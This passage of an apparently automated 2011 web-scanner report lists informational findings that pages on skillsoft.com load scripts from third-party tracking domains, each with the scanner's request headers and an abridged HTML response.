User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46232
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.17. http://skillsoft.com/Books24x7/Product_Information/Collections/WellBeingEssentials.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/WellBeingEssentials.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Books24x7/Product_Information/Collections/WellBeingEssentials.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44444
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:48:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.18. http://skillsoft.com/Books24x7/Product_Information/Collections/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /Books24x7/Product_Information/Collections/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Books24x7/Product_Information/Collections/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45041
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.19. http://skillsoft.com/EMEA/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /EMEA/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /EMEA/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36080
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.20. http://skillsoft.com/about/awards.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/awards.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/awards.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45604
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.21. http://skillsoft.com/about/case_studies.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/case_studies.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/case_studies.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 117933
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.22. http://skillsoft.com/about/company_history.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/company_history.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/company_history.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40801
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.23. http://skillsoft.com/about/contact/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/contact/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/contact/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42638
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.24. http://skillsoft.com/about/credit_programs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/credit_programs/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/credit_programs/ HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40834
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.25. http://skillsoft.com/about/credit_programs/academic_credit_programs/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/credit_programs/academic_credit_programs/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/credit_programs/academic_credit_programs/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42993
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.26. http://skillsoft.com/about/credit_programs/credential_programs/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/credit_programs/credential_programs/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/credit_programs/credential_programs/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41563
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.27. http://skillsoft.com/about/customers.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/customers.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/customers.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40225
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.28. http://skillsoft.com/about/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/default.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/default.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44020
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.29. http://skillsoft.com/about/future_direction.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/future_direction.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/future_direction.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41168
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.30. http://skillsoft.com/about/instructional_design.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/instructional_design.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/instructional_design.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42745
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.31. http://skillsoft.com/about/management_team.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/management_team.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/management_team.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51577
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.32. http://skillsoft.com/about/office_locations.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/office_locations.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/office_locations.asp HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45416
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:43:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
</script>


<script src="http://t.trackedlink.net/_dmpt.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4.33. http://skillsoft.com/about/partners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/partners/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/partners/ HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
